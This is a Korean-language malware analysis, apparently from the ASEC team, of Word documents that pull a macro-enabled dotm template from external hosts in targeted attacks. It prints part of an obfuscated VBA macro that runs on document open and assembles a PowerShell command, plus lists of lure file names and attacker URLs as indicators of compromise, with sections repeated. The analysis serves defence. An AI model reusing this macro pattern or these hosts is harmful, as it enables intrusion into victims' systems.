워드문서를 이용한 특정인 대상 APT 공격시도
Contents
워드문서를 이용한 특정인 대상 APT 공격시도
ASEC 분석팀은 이전 “‘한국정치외교 학술’ 및 ‘정책자문위원 약력’ 악성 워드문서 유포” 등으로 소개하였던 악성 워드 문서와 동일한 유형의 악성코드가 여전히 유포되고 있음을 확인하였다. 최근 확인된 워드 파일 역시 기존과 동일하게 External 링크를 통해 악성 매크로가 포함된 dotm 파일을 다운로드한다. 확인된 파일명과 Extarnal 주소는 아래와 같다.
| 발견일 | 파일명 | External URL |
| 7/3 | [남북회담본부 정책자문위원] 약력 작성 양식.docx | hxxp://jupit.getenjoyment.net/Package/2006/relationships/InterKoreanSummit.dotm |
| 7/6 | 00225 한미의원대화 ***.docx | hxxp://modri.myartsonline.com/officeDocument/2006/relationships/BIO. dotm |
| 7/9 | *** 교수님 BIO.docx | hxxp://visul.myartsonline.com/officeDocument/2006/relationships/BIO. dotm |
| 7/12 | *** 교수-BIO.docx | hxxp://ccav.myartsonline.com/officeDocument/2006/relationships/BIO. dotm |
| 7/15 | BIO 양식.docx | hxxp://tbear.mypressonline.com/officeDocument/2006/relationships/BIO.dotm |
[표-1] 유포 파일명과 External URL
다운로드된 dotm 파일들은 모두 기존에 확인된 것과 동일한 유형의 매크로를 포함하고 있다. 아래는 BIO 양식.docx의 External 링크(hxxp://tbear.mypressonline.com/officeDocument/2006/relationships/BIO.dotm)에서 다운로드된 dotm 파일에 존재하는 악성 매크로이다.
Private Sub Document_Open()
eifhhdfasfiedf
End Sub
Function eifhhdfasfiedf()
Set djfeihfidkasljf = CreateObject("Shell.Application")
Dim dfgdfjiejfjdshaj As String
fjdjkasf = "tlsiajdsladkf"
fjdjkasf = Left(fjdjkasf, 5)
dfgdfjiejfjdshaj = "tlsiaptlsiaotlsiawtlsiaetlsiartlsiastlsiahtlsiaetlsialtlsialtlsia.tlsiaetlsiaxtlsiaetlsia"
dfgdfjiejfjdshaj = Replace(dfgdfjiejfjdshaj, fjdjkasf, "")
hdfksallasjkdlaf = "tlsia[tlsiastlsiattlsiartlsiaitlsiantlsiagtlsia]tlsia$tlsiaatlsia=tlsia{tlsia(tlsiaNtlsiaetlsiawtlsia-tlsiaOtlsiabtlsiajtlsiaetlsiactlsiattlsia "
hdfksallasjkdlaf …
ASEC 분석팀은 이전 “‘한국정치외교 학술’ 및 ‘정책자문위원 약력’ 악성 워드문서 유포” 등으로 소개하였던 악성 워드 문서와 동일한 유형의 악성코드가 여전히 유포되고 있음을 확인하였다. 최근 확인된 워드 파일 역시 기존과 동일하게 External 링크를 통해 악성 매크로가 포함된 dotm 파일을 다운로드한다. 확인된 파일명과 Extarnal 주소는 아래와 같다.
| 발견일 | 파일명 | External URL |
| 7/3 | [남북회담본부 정책자문위원] 약력 작성 양식.docx | hxxp://jupit.getenjoyment.net/Package/2006/relationships/InterKoreanSummit.dotm |
| 7/6 | 00225 한미의원대화 ***.docx | hxxp://modri.myartsonline.com/officeDocument/2006/relationships/BIO. dotm |
| 7/9 | *** 교수님 BIO.docx | hxxp://visul.myartsonline.com/officeDocument/2006/relationships/BIO. dotm |
| 7/12 | *** 교수-BIO.docx | hxxp://ccav.myartsonline.com/officeDocument/2006/relationships/BIO. dotm |
| 7/15 | BIO 양식.docx | hxxp://tbear.mypressonline.com/officeDocument/2006/relationships/BIO.dotm |
[표-1] 유포 파일명과 External URL
다운로드된 dotm 파일들은 모두 기존에 확인된 것과 동일한 유형의 매크로를 포함하고 있다. 아래는 BIO 양식.docx의 External 링크(hxxp://tbear.mypressonline.com/officeDocument/2006/relationships/BIO.dotm)에서 다운로드된 dotm 파일에 존재하는 악성 매크로이다.
Private Sub Document_Open()
eifhhdfasfiedf
End Sub
Function eifhhdfasfiedf()
Set djfeihfidkasljf = CreateObject("Shell.Application")
Dim dfgdfjiejfjdshaj As String
fjdjkasf = "tlsiajdsladkf"
fjdjkasf = Left(fjdjkasf, 5)
dfgdfjiejfjdshaj = "tlsiaptlsiaotlsiawtlsiaetlsiartlsiastlsiahtlsiaetlsialtlsialtlsia.tlsiaetlsiaxtlsiaetlsia"
dfgdfjiejfjdshaj = Replace(dfgdfjiejfjdshaj, fjdjkasf, "")
hdfksallasjkdlaf = "tlsia[tlsiastlsiattlsiartlsiaitlsiantlsiagtlsia]tlsia$tlsiaatlsia=tlsia{tlsia(tlsiaNtlsiaetlsiawtlsia-tlsiaOtlsiabtlsiajtlsiaetlsiactlsiattlsia "
hdfksallasjkdlaf …
IoC
http://ripzi.getenjoyment.net/Package/2006/relationships/InterKoreanSummit.dotm
http://ccav.myartsonline.com/officeDocument/2006/relationships/BIO.dotm
http://giruz.atwebpages.com/sw/cu.txt
http://vbqwer.mypressonline.com/test.log
http://lovels.myartsonline.com/ys/ha.txt
http://visul.myartsonline.com/yk/yo.txt
http://warcr.onlinewebshop.net/Package/2006/relationships/InterKoreanSummit.dotm
http://stair.atwebpages.com/ne/la.txt
http://jupit.getenjoyment.net/Package/2006/relationships/InterKoreanSummit.dotm
http://ccav.myartsonline.com/officeDocument/2006/relationships/BIO
http://stair.myartsonline.com/ya/ng.txt
http://tbear.mypressonline.com/officeDocument/2006/relationships/BIO.dotm
http://ranso.myartsonline.com/Package/2006/relationships/InterKoreanSummit.dotm
http://modri.myartsonline.com/officeDocument/2006/relationships/BIO.dotm
http://visul.myartsonline.com/officeDocument/2006/relationships/BIO
http://benze.atwebpages.com/ki/mc.txt
http://visul.myartsonline.com/officeDocument/2006/relationships/BIO.dotm
http://chels.mypressonline.com/Package/2006/relationships/InterKoreanSummit.dotm
http://warcr.onlinewebshop.net/le/eh.txt
http://rster.atwebpages.com/an/ce.txt
http://obser.mygamesonline.org/nw.txt
http://btige.myartsonline.com/officeDocument/2006/relationships/BIO.dotm
http://lieon.mypressonline.com/Package/2006/relationships/InterKoreanSummit.dotm
http://stair.myartsonline.com/officeDocument/2006/relationships/BIO.dotm
http://lovel.myartsonline.com/le/ej.txt
http://mantc.getenjoyment.net/ya/ng.txt
http://likel.atwebpages.com/bu/ma.txt
http://tbear.mypressonline.com/test.txt
http://modri.myartsonline.com/officeDocument/2006/relationships/BIO
http://modri.myartsonline.com/gu/nw.txt
http://tbear.mypressonline.com/ci/mo.txt
http://ccav.myartsonline.com/officeDocument/2006/relationships/BIO.dotm
http://giruz.atwebpages.com/sw/cu.txt
http://vbqwer.mypressonline.com/test.log
http://lovels.myartsonline.com/ys/ha.txt
http://visul.myartsonline.com/yk/yo.txt
http://warcr.onlinewebshop.net/Package/2006/relationships/InterKoreanSummit.dotm
http://stair.atwebpages.com/ne/la.txt
http://jupit.getenjoyment.net/Package/2006/relationships/InterKoreanSummit.dotm
http://ccav.myartsonline.com/officeDocument/2006/relationships/BIO
http://stair.myartsonline.com/ya/ng.txt
http://tbear.mypressonline.com/officeDocument/2006/relationships/BIO.dotm
http://ranso.myartsonline.com/Package/2006/relationships/InterKoreanSummit.dotm
http://modri.myartsonline.com/officeDocument/2006/relationships/BIO.dotm
http://visul.myartsonline.com/officeDocument/2006/relationships/BIO
http://benze.atwebpages.com/ki/mc.txt
http://visul.myartsonline.com/officeDocument/2006/relationships/BIO.dotm
http://chels.mypressonline.com/Package/2006/relationships/InterKoreanSummit.dotm
http://warcr.onlinewebshop.net/le/eh.txt
http://rster.atwebpages.com/an/ce.txt
http://obser.mygamesonline.org/nw.txt
http://btige.myartsonline.com/officeDocument/2006/relationships/BIO.dotm
http://lieon.mypressonline.com/Package/2006/relationships/InterKoreanSummit.dotm
http://stair.myartsonline.com/officeDocument/2006/relationships/BIO.dotm
http://lovel.myartsonline.com/le/ej.txt
http://mantc.getenjoyment.net/ya/ng.txt
http://likel.atwebpages.com/bu/ma.txt
http://tbear.mypressonline.com/test.txt
http://modri.myartsonline.com/officeDocument/2006/relationships/BIO
http://modri.myartsonline.com/gu/nw.txt
http://tbear.mypressonline.com/ci/mo.txt